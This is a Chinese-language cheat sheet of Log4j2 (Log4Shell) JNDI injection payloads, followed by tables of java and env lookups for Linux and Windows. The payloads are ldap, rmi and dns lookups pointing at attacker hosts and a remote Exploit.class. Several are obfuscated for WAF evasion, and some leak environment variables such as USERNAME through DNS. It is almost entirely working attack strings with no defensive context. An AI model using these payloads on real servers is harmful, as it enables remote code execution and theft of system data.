log4j2 支持很多协议,例如通过 ldap 查找变量,通过 docker 查找变量,从网上大家的测试来看,主要使用 ldap 来构造 payload,详细参考这里:
1.常用payload
${jndi:ldap://127.0.0.1:1389/ Badclassname}
${jndi:ldap://xxx.xxx.xxx.xxx/exp}//Windows
${jndi:dns://${env:OS}.dnslog.com}
${jndi:dns://${env:USERNAME}.dnslog.com} //过waf
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://xxxxxxx.xx/poc}
${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://127.0.0.1:1389/Exploit.class}
${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://asdasd.asdasd.asdasd/poc}
${${::-j}ndi:rmi://asdasd.asdasd.asdasd/ass}
${jndi:rmi://adsasd.asdasd.asdasd}
${${lower:jndi}:${lower:rmi}://adsasd.asdasd.asdasd/poc}
${${lower:${lower:jndi}}:${lower:rmi}://adsasd.asdasd.asdasd/poc}
${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://adsasd.asdasd.asdasd/poc}
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://xxxxxxx.xx/poc}
log4j-java
ID | usage | method |
---|
1 | ${java:version} | getSystemProperty(“java.version”) |
2 | ${java:runtime} | getRuntime() |
3 | ${java:vm} | getVirtualMachine() |
4 | ${java:os} | getOperatingSystem() |
5 | ${java:hw} | getHardware() |
6 | ${java:locale} | getLocale() |
Linux
id | usage |
---|
1 | ${env:CLASSPATH} |
2 | ${env:HOME} |
3 | ${env:JAVA_HOME} |
4 | ${env:LANG} |
5 | ${env:LOGNAME} |
6 | ${env:MAIL} |
7 | ${env:PATH} |
8 | ${env:PWD} |
9 | ${env:SHELL} |
10 | ${env:USER} |
Windows
id | usage |
---|
1 | ${env:A8_HOME} |
2 | ${env:A8_ROOT_BIN} |
3 | ${env:CLASSPATH} |
4 | ${env:JRE_HOME} |
5 | ${env:Java_Home} |
6 | ${env:LOGONSERVER} |
7 | ${env:OS} |
8 | ${env:Path} |
9 | ${env:USERDOMAIN} |
10 | ${env:USERNAME} |
log4j2-sys